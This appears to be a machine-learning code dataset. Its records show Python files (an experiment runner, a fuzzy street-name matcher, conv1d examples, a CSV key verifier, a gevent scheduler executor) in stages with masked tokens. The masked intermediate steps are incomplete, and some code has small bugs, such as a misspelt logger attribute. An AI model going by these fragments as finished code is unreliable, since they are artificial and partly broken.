"step-4": "import logging\nimport os\nfrom os.path import exists, abspath, join, dirname\nfrom os import mkdir\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['MP_NUM_THREADS'] = '1'\nfrom smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner\nfrom plannin_experiment import PlanningExperiment\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger('smallab').propogate = False\nfrom smallab.specification_generator import SpecificationGenerator\nfrom smallab.runner.runner import ExperimentRunner\nfrom smallab.runner_implementations.main_process_runner import MainRunner\nfrom itertools import product\nfrom sample_sim.memory_mapper_utility import map_memory\nfrom smallab.file_locations import get_experiment_save_directory\nimport sys\nimport numpy as np\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 
'waste_unused_rollouts': [True]})\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
"step-5": "import logging\nimport os\nfrom os.path import exists, abspath, join, dirname\nfrom os import mkdir\nos.environ[\"MKL_NUM_THREADS\"] = \"1\"\nos.environ[\"MP_NUM_THREADS\"] = \"1\"\n\nfrom smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner\n\nfrom plannin_experiment import PlanningExperiment\n\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger(\"smallab\").propogate = False\n\nfrom smallab.specification_generator import SpecificationGenerator\nfrom smallab.runner.runner import ExperimentRunner\nfrom smallab.runner_implementations.main_process_runner import MainRunner\nfrom itertools import product\nfrom sample_sim.memory_mapper_utility import map_memory\nfrom smallab.file_locations import get_experiment_save_directory\nimport sys\nimport numpy as np\n\nif __name__ == '__main__':\n if \"experiments\" in os.getcwd():\n os.chdir(\"../..\")\n\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n\n\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = \"IPP_POMCP\"\n num_seeds = 5\n num_steps = 200\n base_specs = {\n \"plot\": False,\n \"file\": [\"fn:sbo\"],\n \"seed\": list(range(num_seeds)),\n \"objective_c\": 10, # 10 for sbo, 100 for validation envs\n \"state_space_dimensionality\": [[50,50,200]], # for fn:sbo, [[62, 70, 5]], # for validation envs\n \"rollout_number_goal\": [num_steps * 150], # z_steps * 150\n \"alpha_param\": 6,\n \"beta_param\": 1,\n \"epsilon\": 10,\n \"delta\": 0.1,\n \"sample_observations\": False,\n \"use_expected_improvement\": False,\n \"planning_steps\": [num_steps],\n }\n\n gen_baseline = base_specs.copy()\n gen_baseline.update({\n \"plan_commitment_algorithm\": \"n_steps\",\n \"plan_threshold\": [1],\n \"rollout_allocation_method\": [\"fixed\"],\n \"waste_unused_rollouts\": [False],\n })\n specs_baseline = 
SpecificationGenerator().generate(gen_baseline)\n\n gen_our_best = base_specs.copy()\n gen_our_best.update({\n \"plan_commitment_algorithm\":\"tTest\",\n \"plan_threshold\":[0.05],\n \"rollout_allocation_method\": [\"beta-ugapeb\"],\n \"waste_unused_rollouts\": [True],\n })\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n\n print(f\"Expt {name}:\\t{len(specifications)/num_seeds} specs to run, over {num_seeds} seeds\")\n for spec in specifications:\n if spec[\"seed\"] == 0:\n print(spec)\n\n runner = ExperimentRunner()\n map_memory(base_specs[\"file\"], base_specs[\"state_space_dimensionality\"])\n DEBUG = False\n\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=True,\n specification_runner=MainRunner(), use_dashboard=False, force_pickle=True, context_type=\"fork\")\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=False,\n specification_runner=MultiprocessingRunner(), context_type=\"fork\", use_dashboard=True,\n force_pickle=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
<|reserved_special_token_0|>
f.readline()
<|reserved_special_token_0|>
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
naam = 'straat'
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open('straten.txt', 'r')
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
from difflib import SequenceMatcher
import csv
naam = 'straat'
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
f = open('straten.txt', 'r')
f.readline()
names = f.readlines()
for name in names:
if similar(name[:-1].lower(), naam.lower()) > 0.7:
sim = similar(name[:-1].lower(), naam.lower())
print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))
<|reserved_special_token_1|>
from difflib import SequenceMatcher
import csv
naam = "straat"
def similar(a, b):
    """Return the fuzzy-match ratio between *a* and *b* as a float in [0, 1]."""
    matcher = SequenceMatcher(None, a, b)
    return matcher.ratio()
# Compare every street name from straten.txt against *naam* and print the
# close matches (similarity above 0.7) together with their scores.
with open("straten.txt", "r") as f:  # `with` fixes the unclosed-file leak
    f.readline()  # skip the header line
    names = f.readlines()

for name in names:
    # Compute the ratio once (it was previously computed twice per match).
    sim = similar(name[:-1].lower(), naam.lower())
    if sim > 0.7:
        print("gevonden: " + name[:-1] + " ---- " + naam + " ---- " + str(sim))
|
flexible
|
{
"blob_id": "2f1193e3ab5e0527ab5f89141613eddb18b5f61d",
"index": 2787,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\n<mask token>\nf.readline()\n<mask token>\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-3": "<mask token>\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-4": "from difflib import SequenceMatcher\nimport csv\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-5": "from difflib import SequenceMatcher\nimport csv\nnaam = \"straat\"\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nf = open(\"straten.txt\", \"r\")\nf.readline()\nnames = f.readlines()\n\nfor name in names:\n if similar(name[:-1].lower(),naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(),naam.lower())\n print(\"gevonden: \" + name[:-1] + \" ---- \" + naam + \" ---- \" + str(sim))\n\n\n\n\n# with open('straatnamen.csv') as csvfile:\n# reader = csv.DictReader(csvfile)\n# for row in reader:\n# print(row['straatnaam'])\n\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
<|reserved_special_token_0|>
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
<|reserved_special_token_0|>
print(i, '\n', k, '\n')
<|reserved_special_token_0|>
print(data, '\n', kernel, '\n')
<|reserved_special_token_0|>
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
<|reserved_special_token_0|>
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
import numpy as np
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):
j = s * i
res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))
return np.array(res)
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
import tensorflow as tf
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
<|reserved_special_token_1|>
# import tensorflow as tf
# from tensorflow.examples.tutorials.mnist import input_data
# mnist = input_data.read_data_sets('/tmp/data/',one_hot=True)
# def build_CNN_clasifier(x):
# x_image = tf.reshape (x, [-1,28,28,1])
#
# #layer1
# w_conv1 = tf.Variable(tf.truncated_normal(shape = [5,5,1,32],stddev= 5e-2))
# b_conv1 = tf.Variable(tf.constant(0.1,shape=[32]))
# h_conv1 = tf.nn.relu(tf.nn.conv2d(x_image,w_conv1,stride=[1,1,1,1,],padding='SAME')+b_conv1)
# h_pool1 = tf.nn.max_pool(h_conv1,ksize=[1,2,2,1],strides = [1,2,2,1],padding='SAME')
#
# #layer2
# w_conv2 = tf.Variable(tf.truncated_normal(shape=[5,5,32,64],stddev = 5e-2))
# b_conv2 = tf.Variable(tf.constant(0.1,shape=[64]))
# h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1,w_conv2,strides=[1,1,1,1],padding='SAME')+b_conv2)
#
# h_pool2 = tf.nn.max_pool(h_conv2,ksize=[1,2,2,1],strides= [1,2,2,1],padding='SAME')
#
# #fully-connected layer
# w_fc_1 = tf.Variable(tf.truncated_normal(shape=[7*7*64,1024],stddev=5e-2))
# b_fc_1 = tf.Variable(tf.constant(0.1,shape=[1024]))
# h_pool2_flat= tf.reshape(h_pool2,[-1,7*7*64])
# h_fc_1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc_1)+b_fc_1)
#
#
#
#
# with tf.Session() as sess:
# sess.run(x_image, feed_dict={x:mnist})
# print(x_image)
# print(x_image.shape)
import numpy as np
def conv1d(x, w, p=0, s=1):
w_rot = np.array(w[::-1])
x_padded = np.array(x)
if p > 0:
zero_pad = np.zeros(shape=p)
x_padded = np.concatenate([zero_pad, x_padded, zero_pad])
res = []
for i in range(0, int((len(x)+2*p-len(w))/s)+1):
j = s*i;
res.append(np.sum(x_padded[j:j+w_rot.shape[0]] * w_rot))
return np.array(res)
## Testing:
x = [1, 0, 2, 3, 0, 1, 1]
w = [2, 1, 3]
print('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))
print('Numpy Results: ', np.convolve(x, w, mode='valid'))
import tensorflow as tf
i = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')
k = tf.constant([2, 1, 3], dtype=tf.float32, name='k')
print(i, '\n', k, '\n')
data = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')
kernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')
print(data, '\n', kernel, '\n')
res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))
#res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'SAME'))
#res = tf.squeeze(tf.nn.conv1d(data, kernel, 2, 'SAME’))
#res = tf.nn.conv1d(data, kernel, 2, 'SAME')
with tf.Session() as sess:
print(sess.run(res))
print(sess.run(data))
|
flexible
|
{
"blob_id": "a336434abc526357db0536955885cf076ee60f59",
"index": 7220,
"step-1": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\n<mask token>\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n<mask token>\nprint(i, '\\n', k, '\\n')\n<mask token>\nprint(data, '\\n', kernel, '\\n')\n<mask token>\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-3": "<mask token>\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n<mask token>\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-4": "import numpy as np\n\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x) + 2 * p - len(w)) / s) + 1):\n j = s * i\n res.append(np.sum(x_padded[j:j + w_rot.shape[0]] * w_rot))\n return np.array(res)\n\n\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\nimport tensorflow as tf\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))\n",
"step-5": "# import tensorflow as tf\n\n# from tensorflow.examples.tutorials.mnist import input_data\n# mnist = input_data.read_data_sets('/tmp/data/',one_hot=True)\n# def build_CNN_clasifier(x):\n# x_image = tf.reshape (x, [-1,28,28,1])\n#\n# #layer1\n# w_conv1 = tf.Variable(tf.truncated_normal(shape = [5,5,1,32],stddev= 5e-2))\n# b_conv1 = tf.Variable(tf.constant(0.1,shape=[32]))\n# h_conv1 = tf.nn.relu(tf.nn.conv2d(x_image,w_conv1,stride=[1,1,1,1,],padding='SAME')+b_conv1)\n# h_pool1 = tf.nn.max_pool(h_conv1,ksize=[1,2,2,1],strides = [1,2,2,1],padding='SAME')\n#\n# #layer2\n # w_conv2 = tf.Variable(tf.truncated_normal(shape=[5,5,32,64],stddev = 5e-2))\n # b_conv2 = tf.Variable(tf.constant(0.1,shape=[64]))\n # h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1,w_conv2,strides=[1,1,1,1],padding='SAME')+b_conv2)\n #\n # h_pool2 = tf.nn.max_pool(h_conv2,ksize=[1,2,2,1],strides= [1,2,2,1],padding='SAME')\n #\n # #fully-connected layer\n # w_fc_1 = tf.Variable(tf.truncated_normal(shape=[7*7*64,1024],stddev=5e-2))\n # b_fc_1 = tf.Variable(tf.constant(0.1,shape=[1024]))\n # h_pool2_flat= tf.reshape(h_pool2,[-1,7*7*64])\n # h_fc_1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc_1)+b_fc_1)\n #\n #\n #\n #\n # with tf.Session() as sess:\n # sess.run(x_image, feed_dict={x:mnist})\n # print(x_image)\n # print(x_image.shape)\n\n\nimport numpy as np\n\ndef conv1d(x, w, p=0, s=1):\n w_rot = np.array(w[::-1])\n\n x_padded = np.array(x)\n if p > 0:\n zero_pad = np.zeros(shape=p)\n x_padded = np.concatenate([zero_pad, x_padded, zero_pad])\n res = []\n for i in range(0, int((len(x)+2*p-len(w))/s)+1):\n j = s*i;\n res.append(np.sum(x_padded[j:j+w_rot.shape[0]] * w_rot))\n\n return np.array(res)\n## Testing:\nx = [1, 0, 2, 3, 0, 1, 1]\nw = [2, 1, 3]\nprint('Conv1d Implementation: ', conv1d(x, w, p=0, s=1))\nprint('Numpy Results: ', np.convolve(x, w, mode='valid'))\n\n\n\n\n\n\nimport tensorflow as tf\ni = tf.constant([1, 0, 2, 3, 0, 1, 1], dtype=tf.float32, name='i')\nk = tf.constant([2, 1, 3], 
dtype=tf.float32, name='k')\nprint(i, '\\n', k, '\\n')\ndata = tf.reshape(i, [1, int(i.shape[0]), 1], name='data')\nkernel = tf.reshape(k, [int(k.shape[0]), 1, 1], name='kernel')\nprint(data, '\\n', kernel, '\\n')\nres = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'VALID'))\n#res = tf.squeeze(tf.nn.conv1d(data, kernel, 1, 'SAME'))\n#res = tf.squeeze(tf.nn.conv1d(data, kernel, 2, 'SAME’))\n#res = tf.nn.conv1d(data, kernel, 2, 'SAME')\nwith tf.Session() as sess:\n print(sess.run(res))\n print(sess.run(data))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
# 키는 첫번째 컬럼에만 설정 가능하다.
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
|
normal
|
{
"blob_id": "eca4abf706fd094a40fdfc8ea483d71b0a018ce9",
"index": 4378,
"step-1": "<mask token>\n\n\nclass ColumnKeyVerifier:\n <mask token>\n <mask token>\n\n def epilogue(self):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n <mask token>\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-3": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-4": "import sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-5": "\nimport sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\nclass ColumnKeyVerifier:\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n\n # 키는 첫번째 컬럼에만 설정 가능하다.\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n\n self.keys[key] = True\n\n return True\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class GeventExecutor(BaseExecutor):
<|reserved_special_token_0|>
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
<|reserved_special_token_1|>
from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError: # pragma: nocover
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\
link(callback)
|
flexible
|
{
"blob_id": "afcadc11d23fb921eb6f8038a908de02ee763ca4",
"index": 693,
"step-1": "<mask token>\n\n\nclass GeventExecutor(BaseExecutor):\n <mask token>\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-2": "<mask token>\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-3": "<mask token>\ntry:\n import gevent\nexcept ImportError:\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
